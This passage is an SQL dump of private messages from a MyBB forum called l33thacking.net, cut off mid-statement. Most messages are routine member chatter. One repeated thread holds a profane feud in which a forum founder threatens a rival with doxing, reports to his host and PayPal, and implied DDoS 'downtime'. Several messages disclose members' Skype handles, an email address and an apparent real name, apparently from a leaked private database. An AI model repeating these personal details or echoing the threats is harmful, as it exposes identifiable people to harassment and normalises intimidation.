Fuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community. I have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. [/quote] Silly HF skid, my dox is public and always has been, I even updated it for everybody. This site is just HF clone #23645 You\'re not the first idiot to think he runs the place and you definitely won\'t be the last. ~Hostpro [/quote] Public? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. [/quote] You honestly make no sense, what have you reported my site for? The Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. ~Hostpro p.s I highly doubt you did anything anyway :roflol: [/quote] I just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick? Actually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? [/quote] [img]http://i.imgur.com/dLn7d.png[/img] Apparently you black mailed him with his ip :lol: With methods like that I can see this forum will go far ;) And I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now. ~Hostpro', '1346967426', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1394', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Nike', '0', '[quote=\'iTzIpod\'] [quote=\'??????Z\'] yeah would have been nice. it doesnt work where i live so i had to pay for my nike jordans [/quote]\\ That sucks.. :/ [/quote] it does. but jordans are worth paying for :)', '1346967458', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1400', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro [/quote] Fuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community. I have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. [/quote] Silly HF skid, my dox is public and always has been, I even updated it for everybody. This site is just HF clone #23645 You\'re not the first idiot to think he runs the place and you definitely won\'t be the last. ~Hostpro [/quote] Public? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. [/quote] You honestly make no sense, what have you reported my site for? The Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. ~Hostpro p.s I highly doubt you did anything anyway :roflol: [/quote] I just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick? Actually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? [/quote] [img]http://i.imgur.com/dLn7d.png[/img] Apparently you black mailed him with his ip :lol: With methods like that I can see this forum will go far ;) And I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now. ~Hostpro [/quote] Lol I don\'t even have him on Skype, don\'t flip words. You\'ll see in a couple of days what I can do. [/quote] Oh, the owner of the great L33t Hacking community has to wait days just to find a booter :lol: ~Hostpro', '1346967705', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1405', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro [/quote] Fuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community. I have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. [/quote] Silly HF skid, my dox is public and always has been, I even updated it for everybody. This site is just HF clone #23645 You\'re not the first idiot to think he runs the place and you definitely won\'t be the last. ~Hostpro [/quote] Public? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. [/quote] You honestly make no sense, what have you reported my site for? The Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. ~Hostpro p.s I highly doubt you did anything anyway :roflol: [/quote] I just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick? Actually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? [/quote] [img]http://i.imgur.com/dLn7d.png[/img] Apparently you black mailed him with his ip :lol: With methods like that I can see this forum will go far ;) And I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now. ~Hostpro [/quote] Lol I don\'t even have him on Skype, don\'t flip words. You\'ll see in a couple of days what I can do. [/quote] Oh, the owner of the great L33t Hacking community has to wait days just to find a booter :lol: ~Hostpro [/quote] I run LH on multiple hosts, lets see if you can really knock it down. [/quote] Who said I\'m going to knock it down :?: You\'re the all mighty hacker here. ~Hostpro', '1346967906', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1410', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Group', '0', 'they\'re just in the \"beta\" stage. Not done yet.', '1346968392', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1412', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] [quote=\'t3h jok3r\'] [quote=\'The Host\'] http://l33thacking.net/showthread.php?tid=347 In case one of your staff members removes: [code] Hello, The only reason I have joined is to post this final warning. You may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links. I understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong. This is your first and final warning, next time I won\'t waste my time warning you. ~Hostpro [/code] ~Hostpro [/quote] Fuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community. I have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. [/quote] Silly HF skid, my dox is public and always has been, I even updated it for everybody. This site is just HF clone #23645 You\'re not the first idiot to think he runs the place and you definitely won\'t be the last. ~Hostpro [/quote] Public? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. [/quote] You honestly make no sense, what have you reported my site for? The Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. ~Hostpro p.s I highly doubt you did anything anyway :roflol: [/quote] I just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick? Actually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? [/quote] [img]http://i.imgur.com/dLn7d.png[/img] Apparently you black mailed him with his ip :lol: With methods like that I can see this forum will go far ;) And I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now. ~Hostpro [/quote] Lol I don\'t even have him on Skype, don\'t flip words. You\'ll see in a couple of days what I can do. [/quote] Oh, the owner of the great L33t Hacking community has to wait days just to find a booter :lol: ~Hostpro [/quote] I run LH on multiple hosts, lets see if you can really knock it down. [/quote] Who said I\'m going to knock it down :?: You\'re the all mighty hacker here. ~Hostpro [/quote] Is your site down? OPPS :whistle: [/quote] It\'s clearly up :?:', '1346968401', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1437', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Unique?', '0', 'hey, how would i go abouts joining the Unique group?', '1346974024', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1439', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hello.', '0', 'hey there. i saw your post about the reviewer group and was wondering that if the group is made could i become a member of that group. i more or less always try out E-books etc and give my thoughts so i think it would be a good group for me :)', '1346974272', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1443', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Unique?', '0', '[quote=\'iTzIpod\'] [quote=\'??????Z\'] hey, how would i go abouts joining the Unique group? [/quote] I recommend you get more active and known in the forum. Because basically right now, mostly everyone is in it.. [/quote] okay :)', '1346975074', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1449', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Unique?', '0', '[quote=\'iTzIpod\'] [quote=\'??????Z\'] [quote=\'iTzIpod\'] [quote=\'??????Z\'] hey, how would i go abouts joining the Unique group? [/quote] I recommend you get more active and known in the forum. Because basically right now, mostly everyone is in it.. [/quote] okay :) [/quote] Sorry. [/quote] Its not a problem mate.', '1346976927', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1459', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello.', '0', '[quote=\'t3h jok3r\'] [quote=\'??????Z\'] hey there. i saw your post about the reviewer group and was wondering that if the group is made could i become a member of that group. i more or less always try out E-books etc and give my thoughts so i think it would be a good group for me :) [/quote] Sure no problem. The group still has some time to become official til then you would have to remain HQ and active. [/quote] Okay mate. will do', '1347110501', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1471', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', '[quote=\'t3h jok3r\'] Can I have your Skype? [/quote] sure xwoogiex is my personal one. Ill just give you that one since I don\'t use my other one anymore.', '1347133416', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1474', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] Yo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. [/quote] I am actually thinking of stepping down from Site Mod, I am very busy with school. [/quote] Are you sure? [/quote] Yeah sorry, I need to focus on school this year, I will be on everyday though. :) [/quote] No problem, would you like to be a Mod or elite? [/quote] Doesn\'t matter, I will be on about every day also. [/quote] Would you be able to post? [/quote] Yeah, sorry I wasn\'t online....my password was messed up.', '1347137439', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1479', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Ey', '0', 'You said you would edit a psd for me and now I want you to do that.Firstly thank you for doing this :D For every sold ebook i will pay you 5-10percent So my 3 Ebooks only cost 10 dollars you will get 0.5 - 1.0 dollar per sold ebook. Correct any grammatical errors you see. Link of psd file:http://www.mediafire.com/?zcbuzjiy6hlaiwz By thread title write this : 3 Ebooks for 10 Dollars Under about write this: Im selling 3 Money making Ebooks for the price of one. All of the three Ebooks were written by me. All of them are working methods. Proof is shown in all the ebooks. Under Features/Prices write this: Feature 1 - 10.00 Dollars/8.00 Euros Feature 2 - 38 pages Feature 3 - With Pictures. Feature 4 - Skype Help Feature 5 - Resale rights are 30.00 Dollars Pls delete the yourskype and yourmsn part. Thanks alot. Sirchamp ', '1347185775', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1481', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] Yo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. [/quote] I am actually thinking of stepping down from Site Mod, I am very busy with school. [/quote] Are you sure? [/quote] Yeah sorry, I need to focus on school this year, I will be on everyday though. :) [/quote] No problem, would you like to be a Mod or elite? [/quote] Doesn\'t matter, I will be on about every day also. [/quote] Would you be able to post? [/quote] Yeah, sorry I wasn\'t online....my password was messed up. [/quote] Lol thanks. What happened to your password? [/quote] it kept saying it was wrong so I had to reset it.', '1347196964', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1483', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'ey again', '0', 'You dont have to make that thread design for me. I did it myself :D But I have a request.. can you please add me on skype so we can talk..my skype: marco.phono1 Its important :D Regards', '1347201426', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1489', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'The forwarder :)', '0', 'hey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks http://l33thacking.net/thread-373.html http://l33thacking.net/thread-356.html http://l33thacking.net/thread-340.html', '1347209967', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1494', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] Yo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. [/quote] I am actually thinking of stepping down from Site Mod, I am very busy with school. [/quote] Are you sure? [/quote] Yeah sorry, I need to focus on school this year, I will be on everyday though. :) [/quote] No problem, would you like to be a Mod or elite? [/quote] Doesn\'t matter, I will be on about every day also. [/quote] Would you be able to post? [/quote] Yeah, sorry I wasn\'t online....my password was messed up. [/quote] Lol thanks. What happened to your password? [/quote] it kept saying it was wrong so I had to reset it. [/quote] Cool, did you get the reset email under 1 hour? [/quote] yeah, it was instant. :)', '1347237111', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1503', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: The forwarder :)', '0', '[quote=\'t3h jok3r\'] [quote=\'??????Z\'] hey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks http://l33thacking.net/thread-373.html http://l33thacking.net/thread-356.html http://l33thacking.net/thread-340.html [/quote] Well you needed to post 3 [u]more[/u] threads. You posted 1 yesterday and you need 2 more, but just create 1 more HQ thread and I\'ll make you a forwader. Also, PM me your desired forwarder address. [/quote] http://l33thacking.net/thread-383.html could you forward the emails to vaider@42commando.com thanks', '1347258786', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1509', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: The forwarder :)', '0', '[quote=\'t3h jok3r\'] [quote=\'??????Z\'] [quote=\'t3h jok3r\'] [quote=\'??????Z\'] hey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks http://l33thacking.net/thread-373.html http://l33thacking.net/thread-356.html http://l33thacking.net/thread-340.html [/quote] Well you needed to post 3 [u]more[/u] threads. You posted 1 yesterday and you need 2 more, but just create 1 more HQ thread and I\'ll make you a forwader. Also, PM me your desired forwarder address. [/quote] http://l33thacking.net/thread-383.html could you forward the emails to vaider@42commando.com thanks [/quote] Nice thread. Sure, but what do username would you like for the forwarder? [/quote] ?ennerz please', '1347316517', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1511', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Coders', '0', 'I was requested to send you this link. http://l33thacking.net/thread-388-post-1781.html', '1347329924', '0', '3', '1347359141', '1', '0', '0', '1347358901'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1517', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] Hey, Do I have you on Skype? If not, can you please add me? I wanna discuss about something. Skype: iTzIpod [/quote] okay, about to goto work, will be back online 7 hours from now.', '1347352327', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1519', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders', '0', '[quote=\'t3h jok3r\'] I was requested to send you this link. http://l33thacking.net/thread-388-post-1781.html [/quote] Im gonna do it right now, in school.', '1347359141', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1524', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I was requested to send you this link. http://l33thacking.net/thread-388-post-1781.html [/quote] Im gonna do it right now, in school. [/quote] You guys have VB.net in school? ', '1347413783', '0', '3', '1347430517', '1', '0', '0', '1347430472'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1537', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'report', '0', 'Did you mean to report teh jokers thread? because I think we both know I can\'t really nuke that post, or move it.', '1347414623', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1545', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Staff/SMod', '0', '[quote=\'iTzIpod\'] What\'s it like being apart of it? :D [/quote] It\'s neat. I feel like I\'m actually helping out by moving threads to right sections things like that. it\'s nice.', '1347417570', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1548', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I was requested to send you this link. http://l33thacking.net/thread-388-post-1781.html [/quote] Im gonna do it right now, in school. [/quote] You guys have VB.net in school? [/quote] Each of us get a personal laptop. :)', '1347430517', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1550', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] [quote=\'??????Z\'] [quote=\'iTzIpod\'] Hey, Do I have you on Skype? If not, can you please add me? I wanna discuss about something. Skype: iTzIpod [/quote] okay, about to goto work, will be back online 7 hours from now. [/quote] Kk Add me when you have the time. [/quote] i have you added, my skype is SamJKendall', '1347434105', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1552', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: The forwarder :)', '0', '[quote=\'t3h jok3r\'] [quote=\'??????Z\'] [quote=\'t3h jok3r\'] [quote=\'??????Z\'] [quote=\'t3h jok3r\'] [quote=\'??????Z\'] hey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks http://l33thacking.net/thread-373.html http://l33thacking.net/thread-356.html http://l33thacking.net/thread-340.html [/quote] Well you needed to post 3 [u]more[/u] threads. You posted 1 yesterday and you need 2 more, but just create 1 more HQ thread and I\'ll make you a forwader. Also, PM me your desired forwarder address. [/quote] http://l33thacking.net/thread-383.html could you forward the emails to vaider@42commando.com thanks [/quote] Nice thread. Sure, but what do username would you like for the forwarder? [/quote] ?ennerz please [/quote] Your forwarder is kennerz@l33thacking.net We are not responsible for how you may use this. Any illegal activities on this forwarder, we will deactivate/remove your forwarder. [/quote] thanks pal :)', '1347434144', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1560', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I was requested to send you this link. http://l33thacking.net/thread-388-post-1781.html [/quote] Im gonna do it right now, in school. [/quote] You guys have VB.net in school? [/quote] Each of us get a personal laptop. :) [/quote] Oh now I get it. ', '1347465694', '0', '1', '0', '1', '0', '0', '1347517116'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1563', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Read', '0', '[quote=\'iTzIpod\'] [quote=\'??????Z\'] [quote=\'iTzIpod\'] [quote=\'??????Z\'] [quote=\'iTzIpod\'] Hey, Do I have you on Skype? If not, can you please add me? I wanna discuss about something. Skype: iTzIpod [/quote] okay, about to goto work, will be back online 7 hours from now. [/quote] Kk Add me when you have the time. [/quote] i have you added, my skype is SamJKendall [/quote] Aight. [/quote] got your message on skype, i was at work all day pal. just got home', '1347468740', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1565', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Eyyyy Thread design', '0', 'Hello Im in the need of a thread design again. Coz i wrote a new e-book. I will send you the text and the threadesign.psd later. I will pay 0.50 cents per sold e-book if you make me this thread design. I will send you the text and .psd tomorow. Thanks :D', '1347476990', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, 